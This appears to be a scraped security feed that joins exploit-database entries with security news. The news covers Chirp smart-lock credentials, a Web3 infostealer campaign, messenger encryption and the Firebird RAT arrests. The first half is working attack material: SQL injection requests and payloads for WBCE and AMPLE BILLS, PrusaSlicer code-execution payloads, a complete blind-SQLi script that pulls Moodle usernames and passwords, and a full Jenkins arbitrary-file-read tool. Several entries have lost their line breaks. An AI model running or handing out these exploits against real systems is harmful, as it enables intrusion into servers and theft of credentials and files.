WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.

    ## Title: AMPLE BILLS 0.1 Multiple-SQLi## Author: nu11secur1ty## Date: 04/13/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The customer parameter (#1*) appears to be vulnerable to SQL injectionattacks. The payload (select*from(select(sleep(20)))a) was submittedin the customer parameter. The application took 20017 milliseconds torespond to the request, compared with 4 milliseconds for the originalrequest, indicating that the injected SQL command caused a time delay.The database appears to be MySQL. The attacker can get all informationfrom the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: customer=(-2876) OR5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024    Type: UNION query    Title: MySQL UNION query (random number) - 1 column    Payload: customer=(-8147) UNION ALL SELECTCONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024- 04/13/2024---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)## Time spent:01:15:00

AMPLE BILLS 0.1 SQL injection

PrusaSlicer versions 2.6.1 and below suffer from an arbitrary code execution vulnerability.

    # Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export# Date: 16/01/2024# Exploit Author: Kamil Breński# Vendor Homepage: https://www.prusa3d.com# Software Link: https://github.com/prusa3d/PrusaSlicer# Version: PrusaSlicer up to and including version 2.6.1# Tested on: Windows and Linux# CVE: CVE-2023-47268==========================================================================================1.) 3mf Metadata extension==========================================================================================PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.==========================================================================================2.) PoC==========================================================================================For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:```; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"```Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:```; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "```

PrusaSlicer 2.6.1 Arbitrary Code Execution

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

Django REST Framework SimpleJWT versions 5.3.1 and below suffer from an information disclosure vulnerability.

    # Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure# Date: 26/01/2024# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)# Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/# Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1# Version: <= 5.3.1# Tested on: MacOS# CVE : CVE-2024-22513# The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.# This vulnerability has the potential to cause various security issues,# including Business Object Level Authorization (BOLA), Business Function# Level Authorization (BFLA), Information Disclosure, etc. The vulnerability# arises from the fact that a user can access web application resources even# after their account has been disabled, primarily due to the absence of proper# user validation checks.# If a programmer generates a JWT token for an inactive user using`AccessToken`# class and `for_user` method then a JWT token is returned which canbe used for# authentication across the django and django rest framework application.# Start Django Shell using below command:# python manage.py shell# ----------------------------------------# Create inactive user and generate token for the userfrom django.contrib.auth.models import Userfrom rest_framework_simplejwt.tokens import AccessToken# create inactive userinactive_user_id = User.objects.create_user('testuser','test@example.com', 'testPassw0rd!', is_active=False).id# django application programmer generates token for the inactive userAccessToken.for_user(User.objects.get(id=inactive_user_id))  # errorshould be raised since user is inactive# django application verifying user tokenAccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #no exception is raised during verification of inactive user token

Django REST Framework SimpleJWT 5.3.1 Information Disclosure

Jenkins version 2.441 suffers from a local file inclusion vulnerability.

# Exploit Title: Jenkins 2.441 - Local File Inclusion  
# Date: 14/04/2024  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.jenkins.io/  
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip  
# Version: 2.441  
# Tested on: Debian 12 (Bookworm)  
# CVE: CVE-2024-23897

from argparse import ArgumentParser  
from requests import Session, post, exceptions  
from threading import Thread  
from uuid import uuid4  
from time import sleep  
from re import findall

class Exploit(Thread):  
  def __init__(self, url: str, identifier: str):  
    Thread.__init__(self)  
    self.daemon = True  
    self.url = url  
    self.params = {"remoting": "false"}  
    self.identifier = identifier  
    self.stop_thread = False  
    self.listen = False

  def run(self):  
    while not self.stop_thread:  
      if self.listen:  
        self.listen_and_print()

  def stop(self):  
    self.stop_thread = True

  def receive_next_message(self):  
    self.listen = True

  def wait_for_message(self):  
    while self.listen:  
      sleep(0.5)

  def print_formatted_output(self, output: str):  
    if "ERROR: No such file" in output:  
      print("File not found.")  
    elif "ERROR: Failed to parse" in output:  
      print("Could not read file.")

    expression = "No such agent \"(.*)\" exists."  
    results = findall(expression, output)  
    print("\n".join(results))

  def listen_and_print(self):  
    session = Session()  
    headers = {"Side": "download", "Session": self.identifier}  
    try:  
      response = session.post(self.url, params=self.params, headers=headers)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to target to setup the listener.")  
      exit(1)

    self.print_formatted_output(response.text)  
    self.listen = False

  def send_file_request(self, filepath: str):  
    headers = {"Side": "upload", "Session": self.identifier}  
    payload = get_payload(filepath)  
    try:  
      post(self.url, data=payload, params=self.params, headers=headers, timeout=4)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to the target to send the request.")  
      exit(1)

  def read_file(self, filepath: str):  
    self.receive_next_message()  
    sleep(0.1)  
    self.send_file_request(filepath)  
    self.wait_for_message()

def get_payload_message(operation_index: int, text: str) -> bytes:  
  text_bytes = bytes(text, "utf-8")  
  text_size = len(text_bytes)  
  text_message = text_size.to_bytes(2) + text_bytes  
  message_size = len(text_message)

  payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message  
  return payload

def get_payload(filepath: str) -> bytes:  
  arg_operation = 0  
  start_operation = 3

  command = get_payload_message(arg_operation, "connect-node")  
  poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

  payload = command + poisoned_argument + start_operation.to_bytes(1)  
  return payload

def start_interactive_file_read(exploit: Exploit):  
  print("Press Ctrl+C to exit")  
  while True:  
    filepath = input("File to download:\n> ")  
    filepath = make_path_absolute(filepath)  
    exploit.receive_next_message()

    try:  
      exploit.read_file(filepath)  
    except exceptions.ReadTimeout:  
      print("Payload request timed out.")

def make_path_absolute(filepath: str) -> str:  
    if not filepath.startswith('/'):  
      return f"/proc/self/cwd/{filepath}"  
    return filepath

def format_target_url(url: str) -> str:  
  if url.endswith('/'):  
    url = url[:-1]  
  return f"{url}/cli"

def get_arguments():  
  parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")  
  parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")  
  parser.add_argument("-p", "--path", help="The absolute path of the file to download")  
  return parser.parse_args()

def main():  
  args = get_arguments()  
  url = format_target_url(args.url)  
  filepath = args.path  
  identifier = str(uuid4())

  exploit = Exploit(url, identifier)  
  exploit.start()

  if filepath:  
    filepath = make_path_absolute(filepath)  
    exploit.read_file(filepath)  
    exploit.stop()  
    return

  try:  
    start_interactive_file_read(exploit)  
  except KeyboardInterrupt:  
    pass  
  print("\nQuitting")  
  exploit.stop()

if __name__ == "__main__":  
  main()

Jenkins 2.441 Local File Inclusion

The U.S. government is warning that smart locks securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock's maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp's parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker **Chirp Systems** remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, **RealPage, Inc.**, is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the **U.S. Cybersecurity & Infrastructure Security Agency** (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

“Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”

**Matt Brown**, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.

“I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”

Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor **August.com**, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.

**Update, April 18, 11:55 a.m. ET:** August has provided a statement saying it does not believe August or Yale locks are vulnerable to the hack described by Brown.

“We were recently made aware of a vulnerability disclosure regarding access control systems provided by Chirp, using August and Yale locks in multifamily housing,” the company said. “Upon learning of these reports, we immediately and thoroughly investigated these claims. Our investigation found no evidence that would substantiate the vulnerability claims in either our product or Chirp’s as it relates to our systems.”

Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.

Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.

Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.

Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by **RealPage**, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.

Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”

“It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of \[the affected\] properties have another choice. It’s either agree to use the app or move.”

In October 2022, an investigation by _ProPublica_ examined RealPage’s dominance in the rent-setting software market, and that it found “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”

“For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”

Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.

In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.

Crickets from Chirp Systems in Smart Lock Key Leak

A Russian-language cyberattack campaign impersonates legitimate game operations to spread various cross-platform infostealers.

Source: Stockphoto Graph via Shutterstock

A Russian threat actor is peppering game developers with fraudulent Web3 gaming projects that drop multiple variants of infostealers on both MacOS and Windows devices.

The ultimate goal of the campaign appears to be defrauding victims and stealing their cryptocurrency wallets, according to Recorded Future's Insikt Group, which discovered the malicious activity.

The extensive Russian-language campaign mimics legitimate projects by using slight alterations in project names and branding — even going so far as to have multiple fake social-media accounts impersonating the projects to make them seem authentic, according to a report published online.

In the attack, the main webpage of a project offers or links to installation files for the purported "game" software, ostensibly for use by developers. However, these files instead deliver either Atomic macOS Stealer for Intel- or ARM-based devices; Rhadamanthys; or RisePro, depending on the victim's operating system.

"The targeted nature of this campaign suggests that threat actors may perceive Web3 gamers as having a more acute vulnerability to social engineering, due to an assumed trade-off in cyber hygiene — meaning that Web3 gamers may have fewer protections in place against cybercrime — in the pursuit of profit," according to the report.

That profit comes in the form of cryptocurrency, as the actor is primarily targeting developers' crypto wallets with the intent of compromising those wallets. Web3 gaming refers to online games such as Axie Infinity and MixMob that are built on blockchain technology, which can result in financial gain for players who earn various cryptocurrencies.

"As wallet compromise continues to be the biggest threat in both Web3 and cryptocurrency security … we assess that wallet compromise is likely the end goal of this campaign," according to Insikt Group. Attackers also can use credentials harvested from the malicious activity "for an array of unauthorized account accesses," according to the report.

Indeed, the report outlines several social media reports of game developers falling victim to the scam and having their crypto wallets drained, including one who lost about 2.5 Ethereum, or about $8,000.

**Setting a Trap Through Impersonation**

The attack campaign comes in the form of what's called "trap phishing," whereby malicious actors duplicate and deploy Web3 project lookalikes.

Insikt researchers began investigating the malicious activity after Web3 smart contract auditor CertiK described a project in January called Astration that used fake job openings and non-fungible token NFT offerings to lure game developers into a trap-phishing campaign that spread infostealers.

The fraudulent project duplicated and recreated nearly all of the social media accounts associated with a legit project called Alteration, including reposting social-media content from legitimate accounts, establishing a direct copy of the project's Discord server, and delivering two types of malware.

Upon further research, Insikt found five additional fraudulent gaming projects, three of which were serving malicious files communicating with the same command-and-control (C2) server as those obtained from the Astration project, as well as two that were no longer active but were found to be similar to the active scams. Purported game names associated with the active projects were ArgonGame, DustFighter, and CosmicWay Reboot, while games associated with the inactive projects were Crypterium World and Myth Island.

Overall, the threat actors are delivering the campaign via "a resilient infrastructure, allowing them to quickly adapt by rebranding or shifting focus upon detection," according to Insikt.

**Maintain Vigilance to Mitigate Risk**

Insikt highlighted the necessity for both individuals and organizations to maintain continuous vigilance against threats and adopt mitigation strategies against campaigns that use phishing as an initial entry point. To that end, the group offered a number of mitigations in its report as well as included a list of indicators of compromise.

One is to provide comprehensive training to users — especially those involved in Web3 gaming or related industries — to recognize social engineering tactics associated with trap phishing. Game developers in particular should "scrutinize the legitimacy of Web3 projects advertised on social media," according to the report.

Organizations also should educate users on the well-known risks associated with downloading software from unverified sources and the importance of verifying the authenticity of project websites before installation.

Endpoint protection solutions updated with the latest threat intelligence — such as antivirus software that are capable of detecting and blocking known infostealer variants like Atomic, Stealc, Rhadamanthys, and RisePro — also can help organizations avoid compromise.

Organizations should also deploy multi-platform security measures to protect against malware infections across both macOS and Windows devices, including firewalls, intrusion detection systems, and endpoint detection and response (EDR) solutions, according to Insikt.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Web3 Game Developers Targeted in Crypto Theft Scheme

By Uzair Amir
Worried about prying eyes? We explain how messenger apps keep your chats confidential with features like encryption & multi-factor authentication.  Learn about security risks & emerging technologies for a safer digital future.
This is a post from HackRead.com Read the original post: Texting Secrets: How Messenger Apps Guard Your Chats

In today’s digital age, conversations are more online than face-to-face; hence, we must be careful with our messages. The widely used **messenger applications** designed for modern communication have advanced greatly in ensuring that our chat remains confidential. However, what measures are taken by such systems to keep our conversations safe from any malicious activity?

****End-to-End Encryption****

This security measure ensures that messages are decrypted only by the intended users. With end-to-end encryption, decryption is only possible by the receiver – the third party cannot intercept or **eavesdrop on the message**.

WhatsApp and Telegram are some chat applications that employ this encryption to secure user chat. Encryption of messages occurs “at the end” with the sender, and it can only be decrypted when it reaches the intended receiver “at the other end”; therefore creating a problem even for the messaging companies that would wish to decrypt and read the messages.

****Security Measures Beyond Encryption****

*   **Two-Factor Authentication (2FA):** To improve security, two-factor authentication requires users to enter a code that is sent to their mobile phone apart from the usual login details. This makes it much safer against unauthorized hackers when passwords get stolen to send **messenger hacked** links and gain access to sensitive accounts.
*   **Biometric Authentication:** Messenger applications can benefit from convenient and safe biometric authentication options like fingerprint and facial recognition. Through the use of individual biological attributes, it guarantees that only the authorized user can unlock their conversations.
*   **Secure Messaging Protocols:** Messenger applications are built on secure messaging protocols (like the Signal Protocol or the Off-the-Record Messaging protocol), enabling encrypted communication channels among different individuals. These protocols ensure that the message remains private even during any attack on the network.

****Challenges and Vulnerabilities********Phishing Attacks****

The security of messenger apps is still seriously threatened by **phishing attacks** when cybercriminals make efforts to deceive people and disclose their login details as well as other important data. Mitigation of this risk requires education as well as awareness about phishing techniques.

**Messenger app security** is also at risk from social engineering tactics like impersonation or manipulation. People must stay alert and suspicious of any odd messages or friend requests coming from unfamiliar ones; rather, they must confirm that the sender is who they claim to be before giving out any confidential data.

****Device Security Risks****

Messenger app communication may be unsafe due to weaknesses in device security, such as malware or **insecure Wi-Fi networks**. To prevent this, it is important to have regular software updates, antivirus software and secure network connections.

****Emerging Technologies in Chat Security****

*   **Quantum Cryptography:** Quantum mechanics is used in quantum cryptography to ensure that data is stored in quantum states, resulting in high levels of safety. Although it is still being considered as an attempt, quantum cryptography provides a potential solution to secure messaging encryption.
*   **Blockchain-Based Messaging Platforms:** With blockchain technology, it becomes possible to have messaging systems which do not centralize message data but rather store it across a distributed network, making it almost impossible for someone to corrupt or prevent certain messages from passing through. The **blockchain messaging applications** enhance safety as well as confidentiality through open and unchangeable message logs.
*   **AI-Powered Threat Detection:** In messenger applications today, there is a growing trend of utilizing artificial intelligence as well as machine learning algorithms to identify and deal with security threats. These systems analyze user activities, messages exchanged, as well as network flow metadata to detect, prevent and respond immediately to any breaches of security.

****Balancing Security and Usability****

Although it is important to have strong security systems, messenger applications need to balance between security and ease of use to be convenient. The flow of messages must not be disrupted, and there should be no negative impact on user experience as a result of complicated security protocols.

****The Future of Secure Messaging****

The landscape of chat security will change with advancing technology. The security of messenger applications will be improved by developments in **encryption algorithms**, authentication mechanisms, and threat detection technologies to guarantee that our conversations remain confidential and safe within cyberspace.

To promote secure communication, it is crucial to educate people on how they can stay safe and why privacy matters. Messaging platforms take part in user awareness programs that emphasize risks posed by hackers and promote preventative security steps.

The security of our conversations is very important at a time when digital communication is dominant. Many security features are used by messaging applications such as end-to-end encryption, biometric authentication, etc., to protect our conversations against any threats.

Nonetheless, the pace at which cyber threats change and develop means that new forms of securing chats must be continuously created. To achieve this, we have to keep on guard and adopt new technologies so that our conversations will stay private and safe.

1.  Zama Secures $73M Series A Lead for Homomorphic Encryption
2.  WhatsApp Encryption Explained — “Everything is not what it seems”
3.  Encrypted Email Service ProtonMail Supports Physical Security Keys

Texting Secrets: How Messenger Apps Guard Your Chats

By Waqas
Firebird RAT, also known as Hive, crippled in an international sting operation. The FBI and AFP arrested the developer and marketer of this malicious remote access trojan.
This is a post from HackRead.com Read the original post: FBI and AFP Arrest Alleged Developer, Marketer of Firebird/Hive RAT

In a collaborative effort spanning continents, law enforcement agencies have dismantled a network responsible for the creation and distribution of malicious software known as Firebird, also rebranded as Hive. This remote access trojan (RAT) enabled unauthorized access to victims’ computers worldwide.

The breakthrough came through a joint investigation launched in 2020 by the Australian Federal Police (AFP) and the Federal Bureau of Investigation (FBI). Their coordinated efforts led to the arrests of two key suspects: an unnamed Australian citizen and Edmond Chakhmakhchyan, a resident of Van Nuys, California, who operated online under the alias “Corruption.”

FIREBIRD’s website (GIF credit: PcRisk)

****Unveiling the Network****

According to the AFP, the Australian suspect is believed to have developed Firebird and sold it on a hacking forum. This RAT allowed users to remotely control infected devices without the victims’ knowledge.

Chakhmakhchyan, on the other hand, allegedly played a crucial role in marketing and selling the software. He is accused of promoting Hive’s stealthy infiltration capabilities to potential buyers, facilitating Bitcoin transactions for purchases, and even offering support to customers.

The AFP investigation resulted in the arrest of the Australian suspect on April 11, 2024. He is facing 12 charges related to computer offences, including developing, supplying, and controlling data with the intent to commit these crimes. His trial is currently underway at the Downing Centre Local Court in Sydney, with a potential maximum sentence of 36 years in prison.

****Taking Down Corruption****

The FBI, working in parallel with the AFP, apprehended Chakhmakhchyan on the same day. A recent US Department of Justice indictment details his alleged involvement. The document accuses Chakhmakhchyan of using the alias “Corruption” to market Hive online, highlighting its ability to gain covert access to target computers.

He is further accused of facilitating Bitcoin transactions for those who purchased the RAT and providing technical support to them. Chakhmakhchyan is scheduled to appear in court for sentencing on May 7, 2024.

****A Global Threat Neutralized****

While Firebird/Hive may not have been among the most notorious RATs, its existence posed a significant threat to user security worldwide. This international operation demonstrates the collaborative efforts of law enforcement agencies in combating cybercrime.

The arrests warn those involved in developing and distributing malicious software, highlighting the potential consequences of their actions and cybercrime in general.

1.  Poland Arrests 2 Suspected Hackers for Train Disruption
2.  Interpol Nets $300 Million, Arrests 3,500 in Major Cyber Crime Bust
3.  China Arrests 4 Who Weaponized ChatGPT for Ransomware Attacks
4.  Ukraine Arrests Hackers for Selling 100M Email, Instagram Accounts
5.  Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US

Tag

#auth